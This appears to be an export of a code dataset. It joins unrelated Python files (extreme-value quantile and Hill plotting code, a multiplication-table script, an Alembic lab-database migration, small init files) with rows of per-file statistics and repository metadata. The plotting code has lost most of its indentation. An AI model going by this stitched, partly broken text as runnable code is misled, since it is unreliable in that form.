# axes[0, 0].set_ylim(params["evi"] * 0.4, params["evi"] * 2.5) # 100
axes[0, 0].set_ylim(params["evi"] * 0.4, params["evi"] * 2.5) # 100
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "hill_plot_evt.eps", format="eps")
filename = "hill-{}-{}-{}-{}-{}-".format(distribution, params, n_replications, n_data, n_quantile)
plt.savefig(pathdir / "{}.eps".format(filename), format="eps")
return
# ====================================================================================================================
# Real plot
# ---------
def real_quantile_plot(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
anchor_points = np.arange(2, n_data) # 2, ..., n-1
real_quantile = X_order[-1] # real extreme quantile at order 1/n
dict_evt = real_estimators(return_full=True)
# plot EVT estimator
for estimator in list_estimators: # list_estimators (all estimators)
lab ="{} (k={}, q={:.2f})".format(estimator, int(dict_evt[estimator]["bestK"][0]), np.array(dict_evt[estimator]["q_bestK"]).ravel()[0])
axes[0, 0].plot(anchor_points, np.array(dict_evt[estimator]["series"]).ravel(), label=lab)
axes[0, 0].scatter(dict_evt[estimator]["bestK"], dict_evt[estimator]["q_bestK"], s=100)
# plot reference line
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data, color="black", linestyle="--")
# label="reference line (q={:.2f})".format(float(real_quantile))
axes[0, 0].legend()
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
# y_lim
axes[0, 0].set_ylim(real_quantile * 0.7, real_quantile * 1.6) # 100
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
axes[0, 0].yaxis.offsetText.set_fontsize(18)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
# plt.savefig(pathdir / "quantile_plot_real.eps", format="eps")
plt.savefig(pathdir / "quantile_plot_real.jpg")
return
def real_quantile_plot_paper(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
EXTREME_ALPHA = 1/n_data
anchor_points = np.arange(2, n_data) # 2, ..., n-1
real_quantile = X_order[-int(EXTREME_ALPHA*n_data)] # real extreme quantile at order 1/n
dict_evt = real_estimators(return_full=True)
axes[0, 0].plot(anchor_points, np.array(dict_evt["RW"]["series"]).ravel(), color="C1")
axes[0, 0].scatter(dict_evt["RW"]["bestK"], dict_evt["RW"]["q_bestK"], s=200, marker="^", color="C1")
axes[0, 0].plot(anchor_points, np.array(dict_evt["CW"]["series"]).ravel(), color="C2")
axes[0, 0].scatter(dict_evt["CW"]["bestK"], dict_evt["CW"]["q_bestK"], s=200,marker="^", color="C2")
# plot reference line
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data, color="black", linestyle="--")
# label="reference line (q={:.2f})".format(float(real_quantile))
# axes[0, 0].legend()
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
# y_lim
axes[0, 0].set_ylim(real_quantile * 0.7, real_quantile * 1.6) # 100
plt.xticks(fontsize=20)
plt.yticks(np.arange(0.6, 1.3, 0.1)*1e7, labels=[0.6, 0.7,0.8,0.9,1., 1.1, 1.2], fontsize=20)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "quantile_plot_real.eps", format="eps")
return
def real_hill_plot(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
EXTREME_ALPHA = 1 / n_data
evt_estimators = ExtremeQuantileEstimator(X=X_order, alpha=EXTREME_ALPHA)
anchor_points = np.arange(2, n_data) # 2, ..., n-1
hill_gammas = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points]
k_prime = evt_estimators.get_kprime_rw(n_data-1)[0]
anchor_points_prime = np.arange(2, int(k_prime)+1)
hill_gammas_prime = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points_prime]
bestK = random_forest_k(np.array(hill_gammas_prime), n_forests=10000, seed=42)
axes[0, 0].plot(anchor_points, hill_gammas, color="black")
    axes[0, 0].scatter(bestK, hill_gammas[bestK - 1], s=200, color="red", marker="^")
axes[0, 0].plot(anchor_points_prime, hill_gammas_prime, color="red")
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "hill_plot_real.eps", format="eps")
return
def real_loglog_plot(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
K_STAR = 68
anchor_points = np.arange(2, n_data) # 2, ..., n-1
i_points = np.arange(1, K_STAR)
y = np.log(X_order[-i_points]) - np.log(X_order[-K_STAR])
X = np.log(K_STAR / i_points)
EXTREME_ALPHA = 1 / n_data
evt_estimators = ExtremeQuantileEstimator(X=X_order, alpha=EXTREME_ALPHA)
hill_gammas = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points]
    gamma = hill_gammas[K_STAR - 1]
axes[0, 0].scatter(X, y, s=100, color="black", marker="+")
axes[0, 0].plot(X, X * gamma, color="red")
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "loglog_plot_real.eps", format="eps")
return
def real_hist_plot(saved=False):
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
h = sns.displot(data=X, aspect=2, height=10)
h.set(ylabel=None) # remove the axis label
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
h.set(xticks=[1e6, 2e6, 3e6, 4e6, 5e6, 6e6, 7e6, 8e6])
h.set_xticklabels(np.arange(1, 9, 1))
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
# plt.savefig(pathdir / "hist_real.eps", format="eps")
plt.savefig(pathdir / "hist_real.jpg")
return
| 41.763021 | 143 | 0.632724 | 2,312 | 16,037 | 4.213235 | 0.103374 | 0.026178 | 0.031414 | 0.017247 | 0.843753 | 0.806693 | 0.781645 | 0.760189 | 0.711118 | 0.702803 | 0 | 0.032556 | 0.189811 | 16,037 | 383 | 144 | 41.872063 | 0.717155 | 0.110432 | 0 | 0.679104 | 0 | 0 | 0.10227 | 0.008387 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.029851 | 0 | 0.100746 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
970414a6073eb0de51b86435d1c2b4a7a6be5bf9 | 131 | py | Python | Licence 1/I11/TP2/tp2_6_2.py | axelcoezard/licence | 1ed409c4572dea080169171beb7e8571159ba071 | [
"MIT"
] | 8 | 2020-11-26T20:45:12.000Z | 2021-11-29T15:46:22.000Z | Licence 1/I11/TP2/tp2_6_2.py | axelcoezard/licence | 1ed409c4572dea080169171beb7e8571159ba071 | [
"MIT"
] | null | null | null | Licence 1/I11/TP2/tp2_6_2.py | axelcoezard/licence | 1ed409c4572dea080169171beb7e8571159ba071 | [
"MIT"
] | 6 | 2020-10-23T15:29:24.000Z | 2021-05-05T19:10:45.000Z | for j in range(1, 11):
print("La table de", j)
for i in range(1, 11):
print(i, "*", j, "=", i * j)
print("\n")
| 21.833333 | 36 | 0.442748 | 24 | 131 | 2.416667 | 0.5 | 0.241379 | 0.275862 | 0.344828 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067416 | 0.320611 | 131 | 5 | 37 | 26.2 | 0.58427 | 0 | 0 | 0 | 0 | 0 | 0.114504 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.6 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
97577a97d2bc041ac0711f0e69fc8d45f32eeda9 | 11,102 | py | Python | migrations/versions/67476b337962_added_more_ytk_plate.py | charlestondance/amoslims | c1d051db3e88a92644446744a9027c5699f52b02 | [
"MIT"
] | null | null | null | migrations/versions/67476b337962_added_more_ytk_plate.py | charlestondance/amoslims | c1d051db3e88a92644446744a9027c5699f52b02 | [
"MIT"
] | 7 | 2020-03-24T15:56:29.000Z | 2022-01-13T00:48:15.000Z | migrations/versions/67476b337962_added_more_ytk_plate.py | charlestondance/amoslims | c1d051db3e88a92644446744a9027c5699f52b02 | [
"MIT"
] | null | null | null | """added more ytk plate
Revision ID: 67476b337962
Revises: 29b76ed5358c
Create Date: 2017-03-17 17:25:56.039832
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '67476b337962'
down_revision = '29b76ed5358c'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('ytk_job_master_level2',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('part_id', sa.String(length=64), nullable=True),
sa.Column('job_master2_well_id', sa.String(length=64), nullable=True),
sa.Column('job_master2_barcode', sa.String(length=64), nullable=True),
sa.Column('sample_number', sa.Integer(), nullable=True),
sa.Column('uploaded_filename', sa.String(length=64), nullable=True),
sa.Column('level1clone_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('level1clone_location_id', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_job_master_level2_job_master2_barcode'), 'ytk_job_master_level2', ['job_master2_barcode'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_job_master2_well_id'), 'ytk_job_master_level2', ['job_master2_well_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_level1clone_location_id'), 'ytk_job_master_level2', ['level1clone_location_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_level1clone_plate_barcode'), 'ytk_job_master_level2', ['level1clone_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_part_id'), 'ytk_job_master_level2', ['part_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_sample_number'), 'ytk_job_master_level2', ['sample_number'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_unique_job_id'), 'ytk_job_master_level2', ['unique_job_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_uploaded_filename'), 'ytk_job_master_level2', ['uploaded_filename'], unique=False)
op.create_table('ytk_stitch_clone',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('clone_plate_well_id_96', sa.String(length=64), nullable=True),
sa.Column('well_number_96', sa.Integer(), nullable=True),
sa.Column('stitch_well_id', sa.String(length=64), nullable=True),
sa.Column('stitch_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('clone_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_id', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_stitch_clone_clone_plate_barcode'), 'ytk_stitch_clone', ['clone_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_clone_plate_well_id_96'), 'ytk_stitch_clone', ['clone_plate_well_id_96'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_stitch_id'), 'ytk_stitch_clone', ['stitch_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_stitch_plate_barcode'), 'ytk_stitch_clone', ['stitch_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_stitch_well_id'), 'ytk_stitch_clone', ['stitch_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_unique_job_id'), 'ytk_stitch_clone', ['unique_job_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_well_number_96'), 'ytk_stitch_clone', ['well_number_96'], unique=False)
op.create_table('ytk_stitch_enzyme',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('stitch_well_id', sa.String(length=64), nullable=True),
sa.Column('stitch_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_id', sa.String(length=64), nullable=True),
sa.Column('transfer_volume', sa.Integer(), nullable=True),
sa.Column('enzyme_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('enzyme_plate_well_id', sa.String(length=64), nullable=True),
sa.Column('enzyme_plate_number', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_barcode'), 'ytk_stitch_enzyme', ['enzyme_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_number'), 'ytk_stitch_enzyme', ['enzyme_plate_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_well_id'), 'ytk_stitch_enzyme', ['enzyme_plate_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_stitch_barcode'), 'ytk_stitch_enzyme', ['stitch_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_stitch_id'), 'ytk_stitch_enzyme', ['stitch_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_stitch_well_id'), 'ytk_stitch_enzyme', ['stitch_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_transfer_volume'), 'ytk_stitch_enzyme', ['transfer_volume'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_unique_job_id'), 'ytk_stitch_enzyme', ['unique_job_id'], unique=False)
op.create_table('ytk_stitch_list',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('stitch_id', sa.String(length=64), nullable=True),
sa.Column('clip_number', sa.Integer(), nullable=True),
sa.Column('clip_batch_number', sa.Integer(), nullable=True),
sa.Column('concatenated_clip_id', sa.String(length=64), nullable=True),
sa.Column('clip_well_id', sa.String(length=64), nullable=True),
sa.Column('clip_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_well_id', sa.String(length=64), nullable=True),
sa.Column('stitch_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_plate_number', sa.Integer(), nullable=True),
sa.Column('transfer_volume', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_stitch_list_clip_barcode'), 'ytk_stitch_list', ['clip_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_clip_batch_number'), 'ytk_stitch_list', ['clip_batch_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_clip_number'), 'ytk_stitch_list', ['clip_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_clip_well_id'), 'ytk_stitch_list', ['clip_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_concatenated_clip_id'), 'ytk_stitch_list', ['concatenated_clip_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_id'), 'ytk_stitch_list', ['stitch_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_plate_barcode'), 'ytk_stitch_list', ['stitch_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_plate_number'), 'ytk_stitch_list', ['stitch_plate_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_well_id'), 'ytk_stitch_list', ['stitch_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_transfer_volume'), 'ytk_stitch_list', ['transfer_volume'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_unique_job_id'), 'ytk_stitch_list', ['unique_job_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_ytk_stitch_list_unique_job_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_transfer_volume'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_well_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_plate_number'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_plate_barcode'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_concatenated_clip_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_well_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_number'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_batch_number'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_barcode'), table_name='ytk_stitch_list')
op.drop_table('ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_enzyme_unique_job_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_transfer_volume'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_stitch_well_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_stitch_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_stitch_barcode'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_well_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_number'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_barcode'), table_name='ytk_stitch_enzyme')
op.drop_table('ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_clone_well_number_96'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_unique_job_id'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_stitch_well_id'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_stitch_plate_barcode'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_stitch_id'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_clone_plate_well_id_96'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_clone_plate_barcode'), table_name='ytk_stitch_clone')
op.drop_table('ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_job_master_level2_uploaded_filename'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_unique_job_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_sample_number'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_part_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_level1clone_plate_barcode'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_level1clone_location_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_job_master2_well_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_job_master2_barcode'), table_name='ytk_job_master_level2')
op.drop_table('ytk_job_master_level2')
# ### end Alembic commands ###
| 74.510067 | 149 | 0.769951 | 1,778 | 11,102 | 4.349269 | 0.045557 | 0.128023 | 0.070348 | 0.087935 | 0.950343 | 0.923316 | 0.871977 | 0.824389 | 0.793353 | 0.759084 | 0 | 0.017489 | 0.083228 | 11,102 | 148 | 150 | 75.013514 | 0.742287 | 0.027202 | 0 | 0.169231 | 0 | 0 | 0.455821 | 0.280405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015385 | false | 0 | 0.015385 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
976e1fc21756a47326ad5d608856b7aad98910d7 | 37 | py | Python | suricata-4.1.4/python/suricata/sc/__init__.py | runtest007/dpdk_surcata_4.1.1 | 5abf91f483b418b5d9c2dd410b5c850d6ed95c5f | [
"MIT"
] | 77 | 2019-06-17T07:05:07.000Z | 2022-03-07T03:26:27.000Z | suricata-4.1.4/python/suricata/sc/__init__.py | clockdad/DPDK_SURICATA-4_1_1 | 974cc9eb54b0b1ab90eff12a95617e3e293b77d3 | [
"MIT"
] | 22 | 2019-07-18T02:32:10.000Z | 2022-03-24T03:39:11.000Z | suricata-4.1.4/python/suricata/sc/__init__.py | clockdad/DPDK_SURICATA-4_1_1 | 974cc9eb54b0b1ab90eff12a95617e3e293b77d3 | [
"MIT"
] | 49 | 2019-06-18T03:31:56.000Z | 2022-03-13T05:23:10.000Z | from suricata.sc.suricatasc import *
| 18.5 | 36 | 0.810811 | 5 | 37 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9796c7708bd029f88262b3f2d834eacab11f2776 | 34 | py | Python | TorchProteinLibrary/Volume/VolumeRMSD/__init__.py | anushriya/TorchProteinLibrary | 889b5594920b4b91bef40edaf478a4584e6ccd7d | [
"MIT"
] | 96 | 2018-10-18T20:08:32.000Z | 2021-09-27T11:31:25.000Z | TorchProteinLibrary/Volume/VolumeRMSD/__init__.py | anushriya/TorchProteinLibrary | 889b5594920b4b91bef40edaf478a4584e6ccd7d | [
"MIT"
] | 24 | 2018-10-19T13:59:21.000Z | 2021-08-04T16:13:48.000Z | TorchProteinLibrary/Volume/VolumeRMSD/__init__.py | anushriya/TorchProteinLibrary | 889b5594920b4b91bef40edaf478a4584e6ccd7d | [
"MIT"
] | 23 | 2018-12-06T06:17:18.000Z | 2021-10-05T12:46:34.000Z | from .VolumeRMSD import VolumeRMSD | 34 | 34 | 0.882353 | 4 | 34 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8af904c42068b0c8c187c16a313750c7afa2dbc9 | 61 | py | Python | upfork/__init__.py | lambdaxymox/upfork | c6eb5cb72d4f6c7f94321aad58fcb8f19f6fa9fa | [
"Apache-2.0",
"MIT"
] | null | null | null | upfork/__init__.py | lambdaxymox/upfork | c6eb5cb72d4f6c7f94321aad58fcb8f19f6fa9fa | [
"Apache-2.0",
"MIT"
] | null | null | null | upfork/__init__.py | lambdaxymox/upfork | c6eb5cb72d4f6c7f94321aad58fcb8f19f6fa9fa | [
"Apache-2.0",
"MIT"
] | null | null | null | from . import upfork
def upfork_main():
upfork.main()
| 10.166667 | 21 | 0.655738 | 8 | 61 | 4.875 | 0.625 | 0.512821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229508 | 61 | 5 | 22 | 12.2 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c1a2a03ff7aba993fe925366d0919a22098fa06d | 26 | py | Python | synchron/udemywidget/__init__.py | sequencecentral/Synchronicity2 | cc3a02fe7540ac5f717a106edeaa3e67e76febb7 | [
"MIT"
] | null | null | null | synchron/udemywidget/__init__.py | sequencecentral/Synchronicity2 | cc3a02fe7540ac5f717a106edeaa3e67e76febb7 | [
"MIT"
] | null | null | null | synchron/udemywidget/__init__.py | sequencecentral/Synchronicity2 | cc3a02fe7540ac5f717a106edeaa3e67e76febb7 | [
"MIT"
] | null | null | null | from .udemywidget import * | 26 | 26 | 0.807692 | 3 | 26 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c1ad8e0b64190b52d8473bc8e0fa6097c67a4b12 | 69 | py | Python | neslter/__init__.py | WHOIGit/nes-lter-ims | d4cc96c10da56ca33286af84d669625b67170522 | [
"MIT"
] | 3 | 2019-01-24T16:32:50.000Z | 2021-11-05T02:18:12.000Z | neslter/__init__.py | WHOIGit/nes-lter-ims | d4cc96c10da56ca33286af84d669625b67170522 | [
"MIT"
] | 45 | 2019-05-23T15:15:32.000Z | 2022-03-15T14:09:20.000Z | neslter/__init__.py | WHOIGit/nes-lter-ims | d4cc96c10da56ca33286af84d669625b67170522 | [
"MIT"
] | null | null | null | from neslter.parsing.files import Resolver # FIXME move to workflow
| 23 | 67 | 0.811594 | 10 | 69 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144928 | 69 | 2 | 68 | 34.5 | 0.949153 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a9ca1df8f58d050a903642beef41fce126230751 | 126 | py | Python | routers/__init__.py | pinchXOXO/Pexon-Rest-API | b7310693ff88a3e22c5e9eee8589f4a79aba97a5 | [
"MIT"
] | 14 | 2021-03-16T15:48:52.000Z | 2021-07-20T10:53:32.000Z | routers/__init__.py | pinchXOXO/Pexon-Rest-API | b7310693ff88a3e22c5e9eee8589f4a79aba97a5 | [
"MIT"
] | 1 | 2021-03-18T02:27:36.000Z | 2021-03-20T16:17:31.000Z | routers/__init__.py | pinchXOXO/Pexon-Rest-API | b7310693ff88a3e22c5e9eee8589f4a79aba97a5 | [
"MIT"
] | 4 | 2021-03-17T06:18:00.000Z | 2021-04-14T11:13:29.000Z | from .user import user_router
